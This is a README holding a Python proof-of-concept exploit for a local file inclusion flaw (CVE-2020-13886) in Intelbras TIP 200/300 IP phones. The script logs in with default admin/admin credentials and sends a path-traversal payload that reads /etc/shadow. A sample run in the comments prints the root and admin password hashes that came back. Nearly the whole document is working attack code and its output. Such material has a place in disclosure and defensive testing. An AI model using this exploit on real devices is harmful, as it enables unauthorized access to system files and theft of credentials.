README.md
Rendering markdown...
# Exploit Title: LFI - Intelbras TIP 200 / TIP 200 LITE / TIP 300
# Date: 12/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: intelbras.com
# Version: 60.61.75.15 / 65.61.75.22
# Tested on: 60.61.75.15 / 65.61.75.22
# CVE : CVE-2020-13886
import urllib.parse
import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth
def poc():
print(""" -------------------------------------------------------------------------------------------------------------
------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ---------------------------
------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT -----------------------------
-------------------------------------------------------------------------------------------------------------\n""")
url = input("URL parameter ->")
payload = input("LFI payload -> ")
if(payload == ""):
payload="../../../../etc/shadow"
urllib.parse.quote(payload)
r = http.get(str(url)+str(payload), auth=HTTPBasicAuth('admin', 'admin'))
print(" ")
text = r.text
print(text)
poc()
#root@skull:~/home# python p0c.py
# -------------------------------------------------------------------------------------------------------------
# ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
# ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
# -------------------------------------------------------------------------------------------------------------
#URL parameter -> http://192.168.0.207/cgi-bin/cgiServer.exx?page=
#LFI payload -> ../../../../etc/shadow
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::